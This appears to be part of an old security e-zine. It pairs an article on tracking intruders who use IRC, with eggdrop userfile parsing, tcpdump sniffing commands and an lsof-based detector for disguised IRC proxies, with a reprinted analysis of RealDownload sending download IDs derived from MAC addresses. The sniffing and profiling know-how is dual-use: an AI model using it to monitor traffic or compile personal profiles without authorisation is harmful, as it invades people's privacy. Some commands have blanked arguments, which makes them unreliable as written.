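import re
from datetime import datetime, timezone

# The user entry shown in the article.
SAMPLE_USERFILE = """\
eleet     lypmjwfp2ee         fbs                      /0 0 0 0
-         *!eleet@*.elaine.Stanford.EDU, *!eleet@*.myth.stanford.edu
:         firebird.stanford.edu:60000
!!        895178133 #stanford
.         {created 894412528}
"""

CONTINUATION_TAGS = {"-", ":", "!!", "."}


def _utc(epoch):
    """UNIX epoch seconds -> timezone-aware UTC datetime."""
    return datetime.fromtimestamp(int(epoch), tz=timezone.utc)


def parse_userfile(text):
    """Parse eggdrop user entries into a list of dicts, one per bot user."""
    users, current = [], None
    for raw in text.splitlines():
        fields = raw.split(None, 1)
        if not fields:
            continue                      # blank line
        tag = fields[0]
        rest = fields[1].strip() if len(fields) > 1 else ""
        if tag not in CONTINUATION_TAGS:
            # First line of an entry: nickname, password, flags.
            head = raw.split()
            if len(head) < 3:
                current = None            # malformed header: drop its continuation lines
                continue
            current = {"nick": head[0], "password": head[1], "flags": head[2],
                       "hostmasks": [], "bot_address": None,
                       "last_seen": None, "modified": None}
            users.append(current)
        elif current is None:
            continue                      # continuation line with no entry to attach to
        elif tag == "-":                  # user identifiers (nick!user@host masks)
            current["hostmasks"] += [m.strip() for m in rest.split(",") if m.strip()]
        elif tag == ":":                  # botnet HOSTNAME:PORT
            host, _, port = rest.rpartition(":")
            if host and port.isdigit():
                current["bot_address"] = (host, int(port))
        elif tag == "!!":                 # last seen: epoch, then channel
            epoch, _, channel = rest.partition(" ")
            if epoch.isdigit():
                current["last_seen"] = (_utc(epoch), channel.strip())
        elif tag == ".":                  # time stamp of the entry itself
            stamp = re.search(r"\d+", rest)
            if stamp:
                current["modified"] = _utc(stamp.group())
    return users


def domains_to_notify(users):
    """Hosts named in hostmasks and bot addresses, lower-cased and de-duplicated."""
    found = set()
    for user in users:
        hosts = [mask.rsplit("@", 1)[-1] for mask in user["hostmasks"]]
        if user["bot_address"]:
            hosts.append(user["bot_address"][0])
        for host in hosts:
            host = host.lower().lstrip("*").lstrip(".")
            if "." in host and "*" not in host:
                found.add(host)
    return sorted(found)


if __name__ == "__main__":
    for user in parse_userfile(SAMPLE_USERFILE):
        seen, channel = user["last_seen"]
        print(user["nick"], user["flags"], "last seen", seen.isoformat(), "on", channel)
    print("notify:", ", ".join(domains_to_notify(parse_userfile(SAMPLE_USERFILE))))
```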
      
      Hackers often will not connect to IRC directly. By using a variety of hosts a hacker can subvert a ban, trick others into thinking he is someone else, or connect to an IRC server that limits connections. Most often,
      though, it is to hide his real IP address in case someone is watching them.
      
      A "bounce" program reads from one port and writes to another, i.e. a proxy. The most famous bounce programs are BNC and WinGate. Both accept a TCP connection, connect to a destination, and then relay
      anything from the original connection to the destination. The primary legitimate use for WinGates is as SOCKS and TCP proxies to the internet. Although WinGates can be configured to require a password, most are
      not. When a hacker has access to a wingate he can "bounce" through the wingate server to hide his tracks.
      
      BNCs, the word "bounce" with the vowels removed, are UNIX-based proxies designed primarily for "bouncing" IRC traffic. While a WinGate can proxy multiple ports, a BNC runs as a daemon listening to only one
      port. After accepting a connection, they too proxy information read on the original connection to a destination. In addition to simple proxying, the BNC configuration file allows for creating fake ident responses, virtual
      host configuration, and limiting the number of users who can use the bounce.
      
      Since these processes run for extended periods of time, a hacker will often try to hide them from an administrator. If a hacker has superuser access and is skillful he can hide any process from any administrator.
      Luckily many hackers are sloppy or lazy. Often they will just change the name of the program to be something innocuous. A local favorite seems to be "pine". The hacker runs the process under the new name hoping
      that the administrator will not notice.
      
      Because hackers are adept at hiding process names, you should always be aware of the network connections your host generates. netstat(1m) and lsof (http://vic.cc.purdue.edu/pub/tools/lsof_4.45_W.tar.gz) are good
      tools for monitoring local network connections. An administrator should also be wary of local processes, such as "./pine" or "./emacs" binding to unusual ports. It's a safe bet that pine doesn't listen to port 6666 and
      write to irc.erols.com.
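
      One way to automate that check, as an added example rather than anything from the original paper: a Python pass over `lsof -i -n -P` output that flags mail-reader or editor names holding a listening socket, and any process connected to a typical IRC port. The sample listing is constructed, the column layout is that of current lsof releases, and the tool list and 6660-6669 port range are assumptions built around the 6666/6667 ports the paper mentions.

```python
# Constructed sample in the column layout of `lsof -i -n -P` (not from the article).
SAMPLE_LSOF = """\
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      412 root    3u  IPv4   1021      0t0  TCP *:22 (LISTEN)
sendmail  388 root    4u  IPv4    977      0t0  TCP *:25 (LISTEN)
pine     2291 jdoe    4u  IPv4   8841      0t0  TCP *:6666 (LISTEN)
pine     2291 jdoe    5u  IPv4   8850      0t0  TCP 192.0.2.10:1044->198.51.100.7:6667 (ESTABLISHED)
pine     2307 asmith  4u  IPv4   8902      0t0  TCP 192.0.2.10:1051->192.0.2.25:143 (ESTABLISHED)
emacs    3310 jdoe    6u  IPv4   9102      0t0  TCP 192.0.2.10:1077->198.51.100.7:6667 (ESTABLISHED)
"""

# Interactive programs that have no reason to accept connections (assumed list).
INTERACTIVE_TOOLS = {"pine", "emacs", "vi", "elm"}
# Assumed range of common IRC server ports around the 6666/6667 named in the text.
IRC_PORTS = range(6660, 6670)


def _port(endpoint):
    """Port number from 'host:port' or '*:port'; None if it is not numeric."""
    port = endpoint.rpartition(":")[2]
    return int(port) if port.isdigit() else None


def suspicious_sockets(lsof_text):
    """Return (pid, command, user, reason) for each socket worth a closer look."""
    findings = []
    for line in lsof_text.splitlines()[1:]:          # skip the header row
        cols = line.split()
        if len(cols) < 9 or cols[7] != "TCP" or not cols[1].isdigit():
            continue
        command, pid, user, name = cols[0], int(cols[1]), cols[2], cols[8]
        state = cols[9].strip("()") if len(cols) > 9 else ""
        local, arrow, remote = name.partition("->")
        if state == "LISTEN" and command in INTERACTIVE_TOOLS:
            findings.append((pid, command, user, f"listening on port {_port(local)}"))
        elif arrow and _port(remote) in IRC_PORTS:
            findings.append((pid, command, user, f"connected to {remote}"))
    return findings


if __name__ == "__main__":
    for pid, command, user, reason in suspicious_sockets(SAMPLE_LSOF):
        print(f"pid {pid} ({command}, user {user}): {reason}")
```

      The second pine process, which only talks to a mail server on port 143, is not flagged; the process name alone is not the signal, the socket is.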
      
      After you've identified a hacker is on your system, and they appear to be using IRC, consider setting up a network sniffer. (Please make sure you talk to your institution's legal department and are aware of all applicable
      laws.) Network dumps are valuable because little, if any, IRC activity is encrypted. Even if a hacker uses an encrypted client to log in, such as SSH, the actual connection to the IRC server will most likely be in
      clear-text.
      
      TCPDump (available from ftp://ftp.ee.lbl.gov) is the standard packet sniffer on most Unix hosts. By default it only captures the first few bytes of every transaction: just enough to diagnose routing and network
      problems. When you're interested in logging entire sessions it's important to read all available packet information. With TCPDump, the -s option controls how much data in each packet is collected. Consult your network
      MTU to determine the optimum setting. We use:
      
      
       # /usr/sbin/tcpdump -n -s 1600 -F  -w tcpdump.
      
      A quick and easy way to view the dump is to use the Unix command strings(1). If too much information is picked up, you can separate your tcpdump file using:
      
      
        # /usr/sbin/tcpdump -r tcpdump. -w  
      
      
      and then run strings again on the output file. For example, if you're only concerned with IRC traffic (which normally is on port 6667), use:
      
      
        # /usr/sbin/tcpdump -r tcpdump. -w irc. dst port 6667
        # strings irc.
      
      After gathering as much information about the hacker as possible through a packet dump and information from the various IRC configuration files, compile an M.O. (Modus Operandi) file. The M.O. should contain
      information such as the hacker's preferred nickname and any variations used, any dial-ups used, any related incidents, and any personal information discovered.
      
      On several occasions I have picked up the exact age, name, and location of the hacker! This type of data is invaluable when contacting law enforcement and correlating various incidents. I've found plotting the
      information on a map is a good way to provide a quick reference of active hackers.
      
      On a slow afternoon I have also been known to go back to the M.O. files and check to see who is on IRC. If I believe I see the same hacker I'll send a quick note to the administrator of the domain, alerting them to a
      potential problem. Sometimes it turns out to be nothing, but the message is always appreciated.
      
      I use ircii (available from http://www.irchelp.org/irchelp/ircii/), the classic UNIX irc client, and primarily connect to EFnet. (Macintosh and PC users should check out http://www.irchelp.org for a list of clients).
      Generally the unix clients are safe as long as you use common sense. Don't accept files from strangers, don't run untrusted IRC scripts, and never run commands you don't understand. With most clients all IRC
      commands start with a forward slash ("/"). Everything else is a message sent to the channel.
      
      After connecting, the first thing I do is start a log. With ircii, the command is:
      
      
              /set log on
      
      The logfile will be named IrcLog. To change names, type:
      
      
              /set logfile 
      
      To look for a person, use the "who" command:
      
      
              /who -nick  (looks for a particular nickname)
              /who -host  (looks for anyone using a particular host)
      
      Wildcards are allowed. However users marked as "invisible" will only show if you specify their exact nickname.
      
      When checking IRC, be sure to look for all variations of the nickname. Hackers have the habit of logging in from a hacked site on a secondary nickname, while logged in with their primary nickname on their dial-in
      account. For example, perhaps there is a hacker who goes by the nickname "eleet". Querying IRC for eleet and eleet_ might show:
      
      
      
      *       eleet   H*  user@ppp-7.isp.net
      *       eleet_  H*  root@www.companyname.com
      
      Chances are that www.companyname.com has been hacked. Even more interesting is that the person who did it probably, though not certainly as ident responses can be faked, is also using the dialup ppp-7.isp.net.
      One note of caution: when using IRC use the who command, not whois.
      
      
              /who -nick 
      
      
      will give you information on the nickname.
      
      
              /whois 
      
      
      will give you more information, but also notify the user that someone is querying their nickname.
      
      Due to the number of hackers using IRC it is often the target of criticism, but there are thousands of legitimate users who use the IRC networks daily. Like any other community there will always be a criminal element.
      When hackers do use IRC it allows the administrator to monitor the criminal element and gain insight into their methodologies and habits. The acquisition of this knowledge can help system administrators, law
      enforcement, and security professionals track and prosecute hackers more effectively.
      
      Reference sites:
      
           http://www.eggxpress.com - Information on eggdrop, BNC, and BitchX configuration files 
           http://www.eggdrop.net - The home of eggdrop 
           http://www.irchelp.org - Provides introductory documents and tutorials for using IRC 
           http://metalab.unc.edu/dbarberi/papers/chats - Papers about the social perspective of IRC 
           http://www.efnet.net - The popular EFNet, a dynamic IRC network and a favorite of many hackers 
           http://www.undernet.org - The Undernet IRC network. 
           http://www.newnet.net - The NewNET IRC network. 
           http://www.self-evident.org - Dedicated to news on EFnet, including information on hackers and channels they frequent. 
      
      
      
      @HWA
      
      
311.0 [IND] More spies in the wires..software that snoops on you and more.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Snarfed from Packetstorm.securify.com 

      URL: grc.com/downloaders.htm
       
      Our Site of the Week is The Anatomy of File Download Spyware.

      "Spyware" is a name given to software which secretly tells its 
      manufacturer your personal information. This page investigates 
      the spyware-like features which come installed with RealNetworks
      RealDownload, Netscape/AOL Smart Download, and NetZip Download 
      Demon utilities. RealNetworks RealDownload turns out not only to
      send the URL of the files you download, but the Windows GUID, 
      a unique identifier which includes each computer's MAC address. 
      
      Info from the site:
     
      The Anatomy of File Download Spyware
      by Steve Gibson, Gibson Research Corporation  --  2000/7/14

      Page Updated: Wednesday, July 26th, 2000
      (only added a link to my telephone appearance on ZDTV.)
      
      What do the NetZip-descended file downloaders whisper when
      they think you are not listening?

      OVERVIEW:  How Does This Affect YOU ?

      As you will see on the page below, if you use the RealNetworks 
      RealDownload, Netscape/AOL Smart Download, or NetZip Download Demon 
      utilities in their default configuration . . . 

      EVERY TIME you use one of these utilities to download ANY FILE from 
      ANYWHERE on the Internet, the complete "URL address" of the file, along 
      with a UNIQUE ID TAG that has been assigned to YOUR machine, and -- in the 
      case of Netscape's SmartDownload only -- YOUR computer's individual 
      Internet IP address, is immediately transmitted to the program's 
      publisher.

      This allows a database of your entire, personal, file download history to 
      be assembled and uniquely associated with your individual computer . . . 
      for whatever purpose the program's publishers may have today, or tomorrow. 

      VERY IMPORTANT: When I re-examined my findings in the face of 
      RealNetworks' insistence that I was absolutely wrong about my conclusions, 
      I caught something that I had missed before: My exact personal name and 
      private eMail address was being sent back to RealNetworks whenever I 
      downloaded a file. When I confronted RealNetworks with this, they 
      explained that it was due to the fact that I had purchased a product from 
      them in the past, and the "cookie" my system had received during the 
      purchase was being returned to them.

      That certainly makes file downloads seem far less "anonymous" than 
      RealNetworks continues to allege. (Full details are provided below.)


      The Saga Unfolds . . . 
      Friday, July 14
      
      I download fresh copies of all three Download Demon-descended file 
      downloading utilities and conduct a series of tests to verify the rumors 
      I've heard about their "phoning home" behavior. 

      In each case, the behavior I examined resulted from each program's 
      "default configuration" which is enabled unless deliberately disabled by 
      the user. I confirmed that all three programs send a report back to their 
      publishers whenever the program is used to download any file through the 
      Internet. This report includes the full URL of the file being downloaded 
      and an "ID Tag" which could be used to uniquely identify the downloading 
      computer. 

      In the case of Netscape's Smart Download, the computer's individual 
      Internet IP address is also sent as a "cookie header" which would tend to 
      defeat IP-masking proxies and anonymizers. 

      Since I was quite alarmed by what I had found and then carefully 
      confirmed, I immediately began notifying the 338,584 members (currently) 
      of my User Managed eMail Notification System and I created a new 
      discussion newsgroup to contain our subsequent public discussion of this 
      issue. 

      Monday, July 17
      
      By Certified Mail I receive RealNetworks' threat letter -- which I ignore 
      because it's just so much nonsense -- and proceed to initiate a very 
      constructive dialog with two representatives of RealNetworks. Their V.P. 
      of Government Affairs and Privacy informs me that I am absolutely, 
      totally, and completely mistaken and insists that I immediately take this 
      page down and retract all of my public statements to everyone who has 
      received them. (I guess he must have read Robert Kimball's letter too.) 

      I refuse to remove the page based solely upon his forceful representations 
      and assurances. But I worry -- in the face of their legal threats -- that I 
      might somehow have been completely mistaken. So I quickly post a big red 
      notice at the top of this page to notify its readers that RealNetworks is 
      very sure that I am completely wrong, and that I am immediately working to 
      re-verify all of my findings. 

      Then a much more serious RealDownload privacy concern rears its ugly head:

      It's Monday afternoon, and everything still comes out just the way it did 
      Friday. (In other words, I was right all along.) However, this time I 
      happen to notice that my actual first and last name, and my own private 
      eMail alias address are also being transmitted to RealNetworks as a result 
      of each file download. So I immediately forward the captured packet to the 
      RealNetworks representatives with whom I'm working and ask them what is 
      going on. 

      By phone the technical manager with whom I'm speaking asks if I've ever 
      purchased anything from Real? I explain that a few months ago I purchased 
      "Real Producer" in order to produce streaming content for my web site. So 
      she explains that my purchase and interaction with their eCommerce server 
      left a "cookie" on my computer which included my real name and personal 
      eMail address from the purchase transaction. 

      I see.  So now my private information -- which was obtained by RealNetworks 
      during a SECURE PURCHASE TRANSACTION with an explicit commitment for 
      security, privacy, and secrecy -- is being sent back to Real -- months later -- 
      "in the clear" with no security, every time I download arbitrary files 
      from the Internet using their utility -- along with the full name of the 
      file I downloaded and the unique ID that could be used to identify my 
      computer. 

      I think that's a "Real" problem. And it would certainly seem to contradict 
      RealNetworks' repeated statements that it is not possible for them to 
      associate my use of RealDownload with any personally identifiable 
      information. If my name and private eMail address aren't "personally 
      identifiable information", what is? Moreover, that personal information 
      could be easily associated with the file download which directly triggered 
      the transmission of that information. 

      Based upon my understanding of how and why this happens, this is easily 
      reproducible and is apparently going on all the time with RealNetworks 
      customers . . . like right now. If what I've been told by the RealNetworks 
      technical manager is true -- and it certainly fits the facts and logic -- it 
      appears that anyone who has purchased a RealNetworks product through their 
      eCommerce system receives an insecure, plaintext, cookie containing their 
      actual name and eMail address. I certainly did. And this cookie is then 
      sent back to RealNetworks . . . 

      . . . even in situations where users of RealNetworks'
      products have been repeatedly and even forcefully
      assured of their absolute anonymity.

      Whoops. 

      On a Technical Point:

      RealNetworks has stated repeatedly that they care about their users' privacy. And they tell us that they are "the leader in the delivery of Internet media." Monday they told
      me that they employ 400 programmers. With all that, wouldn't you be inclined to presume that they had a grasp on Internet Technology? 

      If they care about our privacy, why are they storing
      my real name and private eMail address -- from an
      eCommerce transaction -- as "plain text" in a cookie,
      and sending it out without any security whatsoever?

      Even if it weren't being sent back due to a file download it would still be a significant privacy concern. Why not, instead, use a cookie the way it was intended to be used?
      A cookie should be an "opaque token"; an apparently meaningless string of characters, which only has meaning to the entity which created it.



      But none of that was the problem I was facing at the moment. (Perhaps we'll deal with that one next.) I was working to demonstrate to the RealNetworks representatives the
      absolute truth of what I'd been saying about the transmission of a system-unique ID. 

      So, using RealDownload, I downloaded three different files over the course of several hours and from different Internet servers. I captured each resulting 'downloadid' as it was
      leaving my computer on its way to RealNetworks:

      downloadid=9B1450495BF211D4A025002018252799
      *
      downloadid=9B14504A5BF211D4A025002018252799
      *
      downloadid=9B14504B5BF211D4A025002018252799

      As you can see, they differ by a single character, and that character is changing from "9" to "A" to "B" which indicates standard hexadecimal counting. So I sent these
      'downloadids' to the RealNetworks representatives. This apparently puzzled Real's technical manager who said that she'd have to get back to me on it. When she called back she
      explained that, sure enough, they had succeeded in duplicating the same behavior in their labs and . . . that it must be a bug. 

      A "bug"??   Yeah . . . okay . . . I guess that would be a big one? 

      She explained that she had just learned that the last 24 characters of the "downloadid"'s 32 characters were derived from a Windows GUID. 

      "GUID" stands for "Globally Unique IDentifier" and is a technology standard specified by the Open Software Foundation (OSF) to create unique and non-repeating "ID Tags".
      Such "ID Tags" are generated once then stored, typically in the Windows Registry.

      If you're really curious, use the Windows "RegEdit" program to look under this key name: HKEY_CLASSES_ROOT\CLSID and you'll see a billion GUID's (Don't change anything!)

      In the past, the use of GUID's has aroused the wrath and concern of privacy advocates the world over, since they are like "serial numbers" which can be used to uniquely
      identify software users. 


      Okay. So now we know how and where RealNetworks gets the last 24-characters of their 'downloadid'. It is a non-changing unique identifier, different for every computer. Today,
      they may not like the fact that their use of a deliberately unique and fixed identifier has severe privacy overtones, nor that they have been caught in an outright lie about their
      use of an identifier which is being transmitted and could be used to track the software download habits of their RealDownload users. But I never expected that forcing them to
      publicly confess the truth would make them particularly happy.

      downloadid=9B145049 / 5BF211D4A025002018252799

      It appears to be quite likely that the first eight characters are a hexadecimal representation of a 32-bit binary quantity that is incremented for every download -- that, in any
      event, is the behavior I witnessed. So the first portion which appears to be incremented for each download functions like a "download session ID". Whereas the last 24
      characters are exactly what I have always asserted: A "download machine ID." Together, they create a deliberately concocted, unique identifier, which, when transmitted from
      any user's computer could be used to track their users' download behavior over time and to assemble a download profiling database. 

      Tuesday, July 18
      
      Things were much quieter today. I was told that RealNetworks staff was "in meetings" most of the day. 

      Then, at the end of this long day of "meetings" -- which were apparently spent carefully wording the following document -- RealNetworks produced this formal statement: 

      REALNETWORKS PRIVACY STATEMENT 7/18/00

      In response to recent questions regarding certain technical functions of its RealDownload product, RealNetworks today issued the following statement: 

      "We emphatically disagree with the implications raised by certain members of the technical community about the behavior or planned behavior of RealDownload. To be clear:
      RealDownload does not transmit personally identifiable user information to RealNetworks without informed consent. It does not monitor users' behavior and it does not log
      download URL information. Because we do not log download URL information and the product does not transmit registration information identifying the RealDownload user, we
      cannot and do not store download URLs with personal information -- and we never have. 

      "We work very hard to ensure that our products comply with all of our privacy policies. We have even taken the extra step of hiring Arthur Andersen to independently review
      our compliance with our own strict privacy policies. Through its eSure audit program, Arthur Andersen has independently verified that RealNetworks does not store URLs
      transmitted from the RealDownload product. 

      "Because of the way RealDownload interoperates with the APIs of certain versions of the Windows operating system, it creates for each download a new, 32-character code
      that does not contain any personal information, but apparently does not fully randomize during each download. Now that we are aware of this technical issue, and because
      the 32-character code serves no purpose, we are removing it from forthcoming versions of RealDownload. 

      "As the leader in the delivery of Internet media, we at RealNetworks set for ourselves and will adhere to the highest privacy standards. We appreciate the ongoing diligence
      of privacy experts and we will continue to develop RealNetworks products in a manner that respects customers' privacy." 



      Tuesday Evening . . . 

                                                                  July 18 -- ZDTV's Leo Laporte and I discuss the
                                                                     current situation on Leo's ScreenSavers show.
                                                                      Are you being watched when you download?



       Wednesday, July 19
       
       Regarding RealNetworks' Statement: 

       Since I am in the hot seat here, being the "certain members of the technical community" who has "raised implications", the world will be looking for my reaction to this
       statement from RealNetworks. I received their statement first from RealNetworks directly, then subsequently from several members of the media. Everyone has wanted my
       reaction. Here it is: 

         I am unconcerned and unimpressed with most of RealNetworks' Statement. They specifically failed to address the reason for the presence of the "insufficiently random"
         32-character code whose very existence they had previously denied emphatically. I am, however, pleased to learn that they have decided that it now "serves no purpose"
         and will forthwith be removed from the product. The sooner the better for everyone involved.



       We are still left with what is, arguably, a much bigger problem: The undeniable transmission of personal and private "personally identifiable" information as a direct consequence of
       the use of RealDownload. See the full technical 'dissection' below . . . 

       Thursday, July 20
       
       Everything I hear from RealNetworks indicates that they are taking every issue I have raised on this page very seriously . . . and not just paying them lip-service, but really
       doing something quickly: 

       I am told -- but have not yet verified -- that the opportunity for the significant "personally identifiable" information leakage has already been fixed. That's got to be a
       record -- I only published my discovery of it this morning! 

                                                             WHOOPS! Spoke too soon. NOT
                                                              FIXED as of end of day Friday!

       As I detail below, the potential breach arose from RealDownload images being served from the eCommerce site's domain, thus exposing an eCommerce derived cookie
       during a RealDownload transaction. But since the image URL's were being provided on-the-fly by the RealDownload server, their source server could be changed with no
       change to the product. By serving the RealDownload images from the RealDownload (non-commerce) server, eCommerce cookie disclosures will no longer be triggered. 

       Tomorrow I will verify that this is, in fact, now happening. 

       We are still left with the problem of RealNetworks' storage and transmission "in plaintext form" of information which was received by them over a secure connection. I will
       publish an analysis and discussion of this issue tomorrow. 

       I am told that RealNetworks may release a new version of RealDownload tomorrow . . . thus breaking another retooling speed record. So we might soon have a new version
       of RealDownload that does not, and can not send unique "per-computer" identifiers back to RealNetworks' servers. 

        Any Internet server is typically able to determine the Internet (IP) address of a connected client -- such as the user's computer when it sends a file download report.
        That's how my own 'ShieldsUp' security testing system operates. Therefore, RealDownload users who are extremely security conscious, and who have non-dynamic IP
        addresses (most non-dial up users) may still desire to disable RealDownload's "per file" reporting function so that all "per-download" reporting is disabled.


       We'll see what tomorrow brings. Things are looking up.  

       Friday, July 21
                                                                                             July 21 -- RealNetworks Inc. admitted today its
                                                                                              RealDownload software could be used to track
                                                                                                 specific users' exact download habits.
                                                                                                http://www.msnbc.com/news/436070.asp



        My determination to dig out the WHOLE truth takes an unexpected turn today. Curious about the fact that the size of a full Windows GUID is exactly the same as the size of
        RealNetworks' infamous 'downloadid', I write my own little program to request GUIDs from the Windows operating environment. Running this program three times on the same
        computer which performed Monday's results, generates the following three GUIDs: 

                                                           Three Successive Windows GUIDs WITHOUT reboots

                                                            GUID = CCDE2D405EF811D4A025002018252799
                                                            GUID = CCDE2D415EF811D4A025002018252799
                                                            GUID = CCDE2D425EF811D4A025002018252799




        Notice that, EXACTLY like the three successive downloadids generated by RealDownload on Monday, these GUIDs differ from each other in exactly one character, that
        this character is counting, and most significantly, the LAST 20 CHARACTERS of the GUIDs I generated exactly match the tail of the 'downloadid':

                                                              GUID = CCDE2D405EF8 11D4A025002018252799
                                                        downloadid = 9B1450495BF2 11D4A025002018252799


        Next, I use my GUID-maker program to generate three GUIDs, but I restart Windows each time: 

                                                                 Three Windows GUIDs WITH REBOOTS

                                                            GUID = A7F1BFC05FD811D4A025002018252799
                                                            GUID = 39CC01805FD911D4A025002018252799
                                                            GUID = 8ADA6EE05FD911D4A025002018252799




        We see that the first 12 characters of the GUIDs are different (especially the first eight), whereas the 20 character GUID tail is absolutely constant, even across reboots of a
        single system. 

        Network adapters are designed to possess "globally unique" MAC addresses in order to prevent physical address collisions when communicating across a local network segment.
        This means that Network adapter MAC addresses are a good source for some guaranteed-to-be-unique "bits". Therefore, the Open Software Foundation's (OSF) GUID creation
        scheme incorporates the machine's LAN adapter MAC address, when available, into the GUID's creation. Since the tests have so far been conducted on a networked machine with
        a LAN adapter, the next logical step would be to perform them on a machine without a network card: 

                                                                 Three Windows GUIDs WITH REBOOTS
                                                                   and NO LAN Adapter MAC Address

                                                            GUID = 7A9196805FE811D4BA1DA6C968FAE763
                                                            GUID = 147026E05FE911D4BA1D8FF112DACE63
                                                            GUID = 9C1C35205FE911D4BA1DA55166FEC463




        As you can see above, without a LAN adapter's static MAC address available, the situation again changes. Now a region in the center of the GUIDs is static across GUID
        generation and across reboots, but the last 12 characters, which had previously never changed, are now very different after each reboot. 
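
        Added example, not part of the original article: the identifiers listed above, read as version 1 UUIDs with Python's standard uuid module. It decodes the timestamp,
        clock sequence and node fields and compares the node with the "MAC source address" shown in the packet capture further down this page. The helper names decode and
        compare are this example's own.

```python
import uuid
from datetime import datetime, timedelta, timezone

# Version 1 UUID timestamps count 100 ns ticks from the Gregorian reform date.
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)

# All identifiers below are copied from this page.
DOWNLOAD_IDS = [
    "9B1450495BF211D4A025002018252799",
    "9B14504A5BF211D4A025002018252799",
    "9B14504B5BF211D4A025002018252799",
]
GUIDS_SAME_BOOT = [
    "CCDE2D405EF811D4A025002018252799",
    "CCDE2D415EF811D4A025002018252799",
    "CCDE2D425EF811D4A025002018252799",
]
GUIDS_REBOOTS = [
    "A7F1BFC05FD811D4A025002018252799",
    "39CC01805FD911D4A025002018252799",
    "8ADA6EE05FD911D4A025002018252799",
]
GUIDS_NO_LAN = [
    "7A9196805FE811D4BA1DA6C968FAE763",
    "147026E05FE911D4BA1D8FF112DACE63",
    "9C1C35205FE911D4BA1DA55166FEC463",
]
# "MAC source address" field of the packet capture shown on this page.
CAPTURE_SRC_MAC = "00-20-18-25-27-99"


def decode(hex32):
    """Split a 32-hex-digit identifier into its UUID version 1 fields."""
    u = uuid.UUID(hex=hex32)
    if u.variant != uuid.RFC_4122 or u.version != 1:
        raise ValueError(f"{hex32} is not a version 1 UUID")
    return {
        "canonical": str(u),
        "ticks": u.time,  # 60-bit timestamp in 100 ns units
        "timestamp": GREGORIAN_EPOCH + timedelta(microseconds=u.time // 10),
        "clock_seq": u.clock_seq,
        "node": "-".join(f"{b:02X}" for b in u.node.to_bytes(6, "big")),
    }


def compare(hex_ids):
    """Report which fields stay fixed across a series of identifiers."""
    rows = [decode(h) for h in hex_ids]
    return {
        "same_node": len({r["node"] for r in rows}) == 1,
        "same_clock_seq": len({r["clock_seq"] for r in rows}) == 1,
        "tick_deltas": [b["ticks"] - a["ticks"] for a, b in zip(rows, rows[1:])],
    }


if __name__ == "__main__":
    series = [
        ("downloadids", DOWNLOAD_IDS),
        ("GUIDs, same boot", GUIDS_SAME_BOOT),
        ("GUIDs, reboots", GUIDS_REBOOTS),
        ("GUIDs, no LAN adapter", GUIDS_NO_LAN),
    ]
    for label, ids in series:
        print(label, compare(ids))
        for h in ids:
            d = decode(h)
            print("  ", d["canonical"], d["timestamp"].isoformat(), d["node"])
    first = decode(DOWNLOAD_IDS[0])
    print("node equals capture MAC:", first["node"] == CAPTURE_SRC_MAC)
```

        For the first downloadid the timestamp field decodes to 17 July 2000 (UTC) and the node field to 00-20-18-25-27-99.
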




        So What Does it All Mean? 

        It means this is a big mess. All of the evidence indicates that RealNetworks' 'downloadid' actually is nothing more or less than a standard Windows GUID. 

                                                             downloadid == GUID

        The RealNetworks technical manager told me, Monday, that the last 24 characters of their 'downloadid' were "derived from" a Windows GUID. And while I suppose that's
        technically correct, it's a bit misleading, since I am now virtually certain that their 'downloadid' is exactly and without 'derivation' a Windows GUID. 

                                                          "Huh? They're using dynamically generated
                                                           Windows GUIDs as their download IDs?"

        Yeah . . . I know . . . It is a really weird and dumb thing to do: 

        As we have clearly seen, it is not reliably static enough to use as a trustworthy per-computer identifier, yet it is one, sort of, most of the time, maybe. But neither is it
        random enough to be used as an opaque per-transaction identifier (as I believe it was intended) without the serious privacy concerns that I originally raised. 

        Here's exactly what I believe happened: 

        The copy of NetZip's Download Demon I analyzed exhibits precisely the same behavior as RealNetworks' RealDownload. Therefore, I believe that prior to RealNetworks' acquisition
        of Download Demon from NetZip, some programmer at NetZip wasn't the least bit concerned about privacy issues. (This is certainly still more the rule than the exception today.)
        So this programmer innocently uses a Windows GUID as a convenient unique tag for their Demon's transaction tracking. This programmer never stops to consider, if he or she even
        knew, that the GUID contains -- by design and specification -- the machine's absolutely unique LAN adapter MAC address, or some other relatively invariant machine-specific
        tagging information if the system has no LAN card. 

        Next, RealNetworks apparently commits two blunders: 

           They employ Arthur Andersen to provide a third-party blessing of a second-party product. Since I doubt that the folks from Arthur Andersen are grossly incompetent, it can
           only be that they don't really care about, or understand, the nature and requirements for personal privacy. They put the Arthur Andersen eSeal of Approval on a product
           which is not only sending a unique identifier, but managing to transmit its user's unique MAC adapter address across the Internet while intimately associating it with every
           file download. Yikes!

           RealNetworks, for its part, either didn't perform its own effective or useful code review on a second-party acquired product, or it, too, is not sufficiently aware of the
           requirements for personal privacy. Oh sure, RealNetworks has license agreements, privacy policies, and rampaging lawyers galore, but its actual products suffer time and
           again from significant privacy concerns. 


        RealNetworks has, undeniably, fumbled their acquisition of Download Demon and the release of RealDownload, but . . .

                                                                A completely fair reading of the
                                                             evidence suggests that RealNetworks
                                                           never meant to violate anyone's privacy.

        And, significantly, this is absolutely different from the conclusion I would draw from the design of Netscape's superficially similar Smart Download product. As you will see below,
        Smart Download creates an ID Tag in the registry of any machine it's installed on and transmits that Tag with every file download report. 

        Tuesday, July 25
        
        CONFIRMED: The currently downloadable new version of RealDownload omits the infamous downloadid from its "phoning home" per-file download reports. The reports
        (enabled by default) continue to be sent, but any user-tracking would be much less accurate now, needing to be based upon the user's potentially dynamic IP address. ("Phoning
        home" is a fundamentally non-private action for any Internet software.) 

        CONFIRMED: Previous version(s) of RealDownload continue to retrieve images from RealNetworks' eCommerce server domain. RealNetworks customers who received an
        insecure personal cookie containing their name and address, will have this private and personally identifiable information transmitted as a result of the use of previous version(s) of
        RealDownload. I was told this privacy breach would be eliminated five days ago . . . yet it continues. 


        To Summarize before we examine the details . . . 

        In order to confirm or deny the reports alleging that the Real Networks and Netscape/AOL download utilities might be spying on their users by secretly "phoning home" with detailed reports of every file their users
        download, I used a readily available "packet sniffer" to monitor the data being sent from one of my machines when downloading a handful of my own website's files. 

        I was able to quickly confirm that the NetZip-descended downloaders used by Real Networks and Netscape/AOL were, indeed, sending detailed reports of every download "back to base" every time they were used to
        download a file. 

